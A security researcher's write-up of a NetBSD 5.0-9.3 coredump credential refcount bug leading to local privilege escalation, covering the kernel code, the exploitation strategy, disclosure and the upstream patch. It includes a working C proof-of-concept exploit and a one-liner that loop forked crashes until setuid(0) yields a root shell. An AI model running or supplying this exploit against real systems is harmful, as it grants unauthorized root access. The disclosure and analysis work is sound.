Crash Override: NetBSD 5.0-9.3 Coredump Kernel Refcount LPE
chris
Introduction
NetBSD 5.0 (released 2009) included a change to the in-kernel coredump handler that accidentally introduced a reference count bug on the crashing process' credential.
Triggering the vulnerability leads to a use-after-free that can be trivially (though slowly) exploited to achieve local privilege escalation, gaining root from an unprivileged starting point.
This article will discuss the simplicity of both the vulnerability and the exploitation strategy, leading up to a functional proof of concept exploit.
The vulnerability affects all versions of NetBSD from 5.0 through to 9.3 and can be exploited in an architecture-independent manner. A fix was pushed to the NetBSD 8.x and NetBSD 9.x branches, followed by an advisory release soon afterwards.
Special thanks to Christos Zoulas of NetBSD for keeping me personally updated, and for authoring and pushing through the relevant advisory.
Vulnerability Overview
Coredumps are created for processes when they appear to have unexpectedly terminated. The idea is to capture as much debug information as possible to assist somebody in diagnosing what actually happened and why. These coredumps are usually written to disk in the current working directory of the process with a .core file extension.
We can see the jumping off point for invoking any registered coredump handler in the guts of the signal handling code:
/*
 * Force the current process to exit with the specified signal, dumping core
 * if appropriate. We bypass the normal tests for masked and caught
 * signals, allowing unrecoverable failures to terminate the process without
 * changing signal state. Mark the accounting record with the signal
 * termination. If dumping core, save the signal number for the debugger.
 * Calls exit and does not return.
 */
void
sigexit(struct lwp *l, int signo)
{
	int exitsig, error, docore;
	...
[1]	if ((docore = (sigprop[signo] & SA_CORE)) != 0) {
	...
	if (docore) {
		mutex_exit(p->p_lock);
[2]		MODULE_HOOK_CALL(coredump_hook, (l, NULL), enosys(), error);
If a signal is configured to force an exit of the process, then we end up in this sigexit function. Further, if the specific signal has been configured to trigger a coredump [1], then we reach a call to whatever coredump_hook has been configured [2].
There is only one coredump handler registered in the NetBSD codebase:
MODULE_HOOK_SET(coredump_hook, coredump);
The coredump function describes itself well and is pretty simple:
/*
 * Dump core, into a file named "progname.core" or "core" (depending on the
 * value of shortcorename), unless the process was setuid/setgid.
 */
static int
coredump(struct lwp *l, const char *pattern)
{
	struct vnode *vp;
	struct proc *p;
	struct vmspace *vm;
	kauth_cred_t cred;
	struct pathbuf *pb;
	struct vattr vattr;
	struct coredump_iostate io;
	struct plimit *lim;
	int error, error1;
	char *name, *lastslash;
	...
	/*
	 * It may well not be curproc, so grab a reference to its current
	 * credentials.
	 */
[3]	kauth_cred_hold(p->p_cred);
	cred = p->p_cred;
	...
[4]	pb = pathbuf_create(name);
	if (pb == NULL) {
		error = ENOMEM;
		goto done;
	}
[5]	error = vn_open(NULL, pb, 0, O_CREAT | O_NOFOLLOW | FWRITE,
	    S_IRUSR | S_IWUSR, &vp, NULL, NULL);
	if (error != 0) {
		pathbuf_destroy(pb);
[6]		goto done;
	}
	...
[7] done:
	if (name != NULL)
		PNBUF_PUT(name);
	return error;
}
One of the first things the function does is hold onto the crashing process' credential [3]. This takes a reference on it so that it can't go away while it's being dealt with.
Omitted from the snippet here is the logic for building up the corefile name. Once it has been built, the function goes on to create a pathbuf from it [4] and then tries to open that path for writing through vn_open at [5].
If that vn_open fails for any reason (for instance, if the crashing process doesn't have permission to create files in the current directory), then the code jumps to done [6].
At done, we expect to see the cleanup code for the failed coredump attempt [7]. The name pathname buffer is indeed released with PNBUF_PUT, but nothing else happens here.
Importantly, the reference taken on the credential at [3] is never released. In fact, none of the error or success paths seem to do this.
This is the vulnerability: it's a classic refcount bug that we can trigger by crashing one of our processes.
Exploitability Analysis
To understand whether this refcount bug is exploitable, we need to ensure that a wrap of the refcount won't be detected or prevented. We can find that out by looking at the kauth_cred_hold function:
/* Increment reference count to cred. */
void
kauth_cred_hold(kauth_cred_t cred)
{
	KASSERT(cred != NULL);
	KASSERT(cred != NOCRED);
	KASSERT(cred != FSCRED);
	KASSERT(cred->cr_refcnt > 0);
[1]	atomic_inc_uint(&cred->cr_refcnt);
}
We see here that atomic_inc_uint is used to increment the reference count [1]. That will not detect a wrap. The KASSERTs in this function are also essentially no-ops for anything other than debug kernels, so we can ignore them.
Also worth noting is that cr_refcnt is a u_int. That's 32 bits wide on the platforms we probably care about, which means that wrapping the count is feasible.
Assuming we can wrap the reference count and trigger a path that decrements it afterwards, what happens? We can answer that by looking at the responsible function, kauth_cred_free:
/* Decrease reference count to cred. If reached zero, free it. */
void
kauth_cred_free(kauth_cred_t cred)
{
	KASSERT(cred != NULL);
	KASSERT(cred != NOCRED);
	KASSERT(cred != FSCRED);
	KASSERT(cred->cr_refcnt > 0);
	ASSERT_SLEEPABLE();
#ifndef __HAVE_ATOMIC_AS_MEMBAR
	membar_release();
#endif
[2]	if (atomic_dec_uint_nv(&cred->cr_refcnt) > 0)
		return;
#ifndef __HAVE_ATOMIC_AS_MEMBAR
	membar_acquire();
#endif
	kauth_cred_hook(cred, KAUTH_CRED_FREE, NULL, NULL);
	specificdata_fini(kauth_domain, &cred->cr_sd);
[3]	pool_cache_put(kauth_cred_cache, cred);
}
This function decrements the refcount and, if it's still positive [2], simply returns. If the refcount did drop to zero, then a little tidying up is done before putting the credential back into the kauth_cred_cache [3].
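This is an interesting point to note: kauth_cred_t objects are allocated from their own dedicated pool and not the general purpose heap. This fact informs our exploit development process: in practice, the freed slot will be reclaimed by another credential allocation, so whatever replaces our credential will itself be a credential.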
I admit to knowing next to nothing about the NetBSD kernel heaps. Even so, without knowing any of the internals, we can make an educated guess that it probably works in a last-in, first-out (LIFO) fashion as most kernel heap implementations tend to.
Exploitation Strategy
We need to think about how we might exploit this:
- Trigger the vulnerability to wrap the kauth_cred_t refcount to 1.
- Cause kauth_cred_free to get called somehow.
- Have a privileged kauth_cred_t allocated in its place.
If we assume the kernel heap operates on a LIFO basis, this should be enough to elevate our privileges. So what could be a convenient way of calling kauth_cred_free on our credential?
One very simple observation is that kauth_cred_free is called when a process is reaped. This leads to a nice, simple strategy of looping over the following steps:
1. Fork.
2. In the child, trigger a coredump (e.g. through abort(3)).
3. In the parent, reap the child through wait(2).
Eventually that reap at step 3 will drop the kauth_cred_t reference from its wrapped value of 1 down to 0 and cause it to be freed, leaving the parent process with a dangling credential pointer (p->p_cred).
With a dangling kauth_cred_t pointer, our next job is to allocate a privileged credential in its place. How could we do that? Amusingly, it turns out that we can just call setuid(0) and magically become root. :)
Let's start out by looking at sys_setuid:
/* ARGSUSED */
int
sys_setuid(struct lwp *l, const struct sys_setuid_args *uap, register_t *retval)
{
	/* {
		syscallarg(uid_t) uid;
	} */
	uid_t uid = SCARG(uap, uid);
[1]	return do_setresuid(l, uid, uid, uid,
	    ID_R_EQ_R | ID_E_EQ_R | ID_S_EQ_R);
}
Most of the core logic of the various setuid functions is actually implemented by the do_setresuid function [1].
/*
 * Set real, effective and saved uids to the requested values.
 * non-root callers can only ever change uids to values that match
 * one of the processes current uid values.
 * This is further restricted by the flags argument.
 */
int
do_setresuid(struct lwp *l, uid_t r, uid_t e, uid_t sv, u_int flags)
{
	struct proc *p = l->l_proc;
	kauth_cred_t cred, ncred;
[2]	ncred = kauth_cred_alloc();
	/* Get a write lock on the process credential. */
	proc_crmod_enter();
[3]	cred = p->p_cred;
	/*
	 * Check that the new value is one of the allowed existing values,
	 * or that we have root privilege.
	 */
	if ((r != -1
	    && !((flags & ID_R_EQ_R) && r == kauth_cred_getuid(cred))
	    && !((flags & ID_R_EQ_E) && r == kauth_cred_geteuid(cred))
	    && !((flags & ID_R_EQ_S) && r == kauth_cred_getsvuid(cred))) ||
	    (e != -1
	    && !((flags & ID_E_EQ_R) && e == kauth_cred_getuid(cred))
	    && !((flags & ID_E_EQ_E) && e == kauth_cred_geteuid(cred))
	    && !((flags & ID_E_EQ_S) && e == kauth_cred_getsvuid(cred))) ||
	    (sv != -1
	    && !((flags & ID_S_EQ_R) && sv == kauth_cred_getuid(cred))
	    && !((flags & ID_S_EQ_E) && sv == kauth_cred_geteuid(cred))
	    && !((flags & ID_S_EQ_S) && sv == kauth_cred_getsvuid(cred)))) {
		int error;
		error = kauth_authorize_process(cred, KAUTH_PROCESS_SETID,
		    p, NULL, NULL, NULL);
		if (error != 0) {
			proc_crmod_leave(cred, ncred, false);
			return error;
		}
	}
	/* If nothing has changed, short circuit the request */
[4]	if ((r == -1 || r == kauth_cred_getuid(cred))
	    && (e == -1 || e == kauth_cred_geteuid(cred))
	    && (sv == -1 || sv == kauth_cred_getsvuid(cred))) {
[5]		proc_crmod_leave(cred, ncred, false);
		return 0;
	}
	...
The very first thing that happens in this function is that a new credential, ncred, is allocated [2]. We also pull out the pointer to the current credential, cred [3].
If the kernel heap really is LIFO and p->p_cred is dangling, we actually end up in the situation where ncred == cred. So p->p_cred now points to whatever kauth_cred_alloc returned:
/* Allocate new, empty kauth credentials. */
kauth_cred_t
kauth_cred_alloc(void)
{
	kauth_cred_t cred;
	cred = pool_cache_get(kauth_cred_cache, PR_WAITOK);
	cred->cr_refcnt = 1;
	cred->cr_uid = 0;
	cred->cr_euid = 0;
	cred->cr_svuid = 0;
	cred->cr_gid = 0;
	cred->cr_egid = 0;
	cred->cr_svgid = 0;
	cred->cr_ngroups = 0;
	specificdata_init(kauth_domain, &cred->cr_sd);
	kauth_cred_hook(cred, KAUTH_CRED_INIT, NULL, NULL);
	return (cred);
}
Aha, that just happens to be a nice pure root cred. :)
With both ncred and cred pointing to a pure root cred, we skip over the first big if-statement in do_setresuid and land at [4]. The conditions at [4] now check out, so we call proc_crmod_leave [5] before returning success to userland.
We are now magically root.
An important side note here is that our p->p_cred is actually still dangling: that's because the call to proc_crmod_leave drops a reference on one of the cred arguments. Since the cred has a refcount of 1 at this point, a free will occur.
But that's okay as long as we're careful: figuring out how to secure our access and leave the system in a stable state from this point is academic. For our proof of concept, just doing this will be fine.
The final process is:
- Loop while setuid(0) fails:
  - Fork.
  - In the child, call abort(3) to trigger a coredump.
  - In the parent, call wait(2) to reap the child.
- If we've exited the loop, we're now root, so drop to a shell.
Visualisation
Some ASCII art can help visualise this process. After many coredumps, we end up with our kauth_cred_t's cr_refcnt being zero:
Now when this child triggers a coredump, we end up with yet another reference taken:
Since coredump bumps the refcount to 1 and leaves it there, when the parent process now comes to reap the child, kauth_cred_free will see cr_refcnt drop to zero and free the cred:
Now our process' p_cred points to something that still looks like a cred, but it's actually been freed.
Calling setuid(0) now will allocate that same virtual address, overwrite it, find that we already appear to be root and return success (freeing the cred back again). That leaves us in this state:
Our p_cred is still pointing to freed memory, but now it looks like a root cred because of how do_setresuid works. We're effectively root, even if we are standing on thin ice at this point.
Proof of Concept Exploit
Here's the code with utility code omitted:
/*
 * Crash Override: NetBSD 5.0-9.3 Coredump LPE PoC
 * By [email protected] / 2022-Sep-06
 */
#include <machine/limits.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>
#include "libpoc.h"

const char *poc_title = "NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)";
const char *poc_author = "[email protected]";

int
main(int argc, char *argv[])
{
	unsigned int n;
	char * const av[] = { "/bin/sh", "-i", NULL };
	char * const ev[] = { "PATH=/bin:/sbin:/usr/bin:/usr/sbin", NULL };

	banner();

	/* We can't create files in /, so vn_open() fails and coredump() takes the leaking error path. */
	log_info("Changing directory to /");
	expect(chdir("/"));

	log_info("Beginning refcount wrap");
	for (n = 0; n < UINT_MAX; ++n) {
		if (!(n & 0x000fffff)) {
			log_progress("Progress: 0x%08x / ~0x%08x...", n, UINT_MAX);
		}
		if (!vfork()) {
			/* Child: crash so that coredump() leaks a cred reference. */
			abort();
		} else {
			/* Parent: reap the child, dropping its cred reference. */
			expect(wait(NULL));
		}
		/* Succeeds once our cred has been freed and reallocated as root. */
		if (!setuid(0)) {
			break;
		}
	}
	log_progress_complete();

	if (getuid() == 0) {
		log_info("Success!");
		expect(execve(av[0], av, ev));
	}
	log_fatal("Failed");
	return 0;
}
A full PoC archive is provided at the end of the article.
We can also make this a terrible one-liner for which I can only apologise:
/* cc -o d d.c && ./d */
main(){while((vfork()||*(int*)0)&&(!wait(0)||setuid(0)));execl("/bin/sh","-i",0);}
Triggering this particular refcount bug takes some time since we're continuously creating and destroying processes as we go. This was compounded by the fact that my experiments were being done on an emulated amd64 QEMU VM; all of my machines are Apple Silicon these days. vfork helps substantially over fork, but it's still a multi-hour marathon to complete the wrap.
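A back-of-the-envelope estimate shows why. If fork/crash/reap cycles complete at some rate R, the wrap needs roughly 2^32 cycles, so the total time is about 2^32 / R. The rate below is a purely hypothetical round number chosen for illustration, not a measurement from these experiments:

```latex
T \approx \frac{2^{32}}{R}
  = \frac{4\,294\,967\,296}{10^{5}\ \text{cycles/s}}
  \approx 4.29 \times 10^{4}\ \text{s}
  \approx 11.9\ \text{h}
```

Halving the per-cycle cost halves T, which is why swapping fork for vfork makes such a noticeable difference.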
To simplify exploit development, I decided to cheat. I modified the kernel coredump function locally to wrap after p->p_cred->cr_refcnt exceeded 200, then recompiled overnight. This gave me confidence that the bug was real without being too expensive time-wise.
Once the technique was proven, I repeated it against unmodified, clean installs of both NetBSD 9.3 and NetBSD 8.0, as those represented the span of currently maintained releases at the time of writing. The exploit succeeded just fine on both.
Here's some sample output of the PoC running:
$ uname -msr
NetBSD 9.3 amd64
$ make all && ./crash-override
cc -c -o crash-override.o crash-override.c
cc -c -o libpoc.o libpoc.c
cc -o crash-override crash-override.o libpoc.o
[+] NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)
[+] By [email protected]
[+] ---
[+] Changing directory to /
[+] Beginning refcount wrap
[+] Progress: 0xfff00000 / ~0xffffffff...
[+] Success!
# id
uid=0(root) gid=0(wheel)
# whoami
root
#
Fix
I reported the issue to the NetBSD Security Alert Team on the 6th of September, 2022. The issue was quickly fixed with the following patch:
diff --git a/sys/kern/kern_core.c b/sys/kern/kern_core.c
index c42bcfb229ea..22f47c894ae8 100644
--- a/sys/kern/kern_core.c
+++ b/sys/kern/kern_core.c
@@ -1,4 +1,4 @@
-/* $NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $ */
+/* $NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $ */
/*
* Copyright (c) 1982, 1986, 1989, 1991, 1993
@@ -37,7 +37,7 @@
*/
#include <sys/cdefs.h>
-__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $");
+__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $");
#ifdef _KERNEL_OPT
#include "opt_execfmt.h"
@@ -121,7 +121,7 @@ coredump(struct lwp *l, const char *pattern)
struct vnode *vp;
struct proc *p;
struct vmspace *vm;
- kauth_cred_t cred;
+ kauth_cred_t cred = NULL;
struct pathbuf *pb;
struct vattr vattr;
struct coredump_iostate io;
@@ -145,9 +145,7 @@ coredump(struct lwp *l, const char *pattern)
if (USPACE + ctob(vm->vm_dsize + vm->vm_ssize) >=
p->p_rlimit[RLIMIT_CORE].rlim_cur) {
error = EFBIG; /* better error code? */
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
+ goto release;
}
/*
@@ -164,9 +162,7 @@ coredump(struct lwp *l, const char *pattern)
if (p->p_flag & PK_SUGID) {
if (!security_setidcore_dump) {
error = EPERM;
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
+ goto release;
}
pattern = security_setidcore_path;
}
@@ -180,11 +176,8 @@ coredump(struct lwp *l, const char *pattern)
error = coredump_buildname(p, name, pattern, MAXPATHLEN);
mutex_exit(&lim->pl_lock);
- if (error) {
- mutex_exit(p->p_lock);
- mutex_exit(&proc_lock);
- goto done;
- }
+ if (error)
+ goto release;
/*
* On a simple filename, see if the filesystem allow us to write
@@ -198,6 +191,7 @@ coredump(struct lwp *l, const char *pattern)
error = EPERM;
}
+release:
mutex_exit(p->p_lock);
mutex_exit(&proc_lock);
if (error)
@@ -284,6 +278,8 @@ coredump(struct lwp *l, const char *pattern)
if (error == 0)
error = error1;
done:
+ if (cred != NULL)
+ kauth_cred_free(cred);
if (name != NULL)
PNBUF_PUT(name);
return error;
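We can see that the fix correctly adds the missing kauth_cred_free call to the exit path. Because cred is now initialised to NULL, any path that reaches done before the reference has been taken skips the release. The early error paths are also routed through a new release label, which drops the two locks before jumping to done.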
The patch was made for NetBSD 8.x and 9.x; releases prior to NetBSD 8.0 are not maintained per the NetBSD maintenance policy and so won't receive the fix.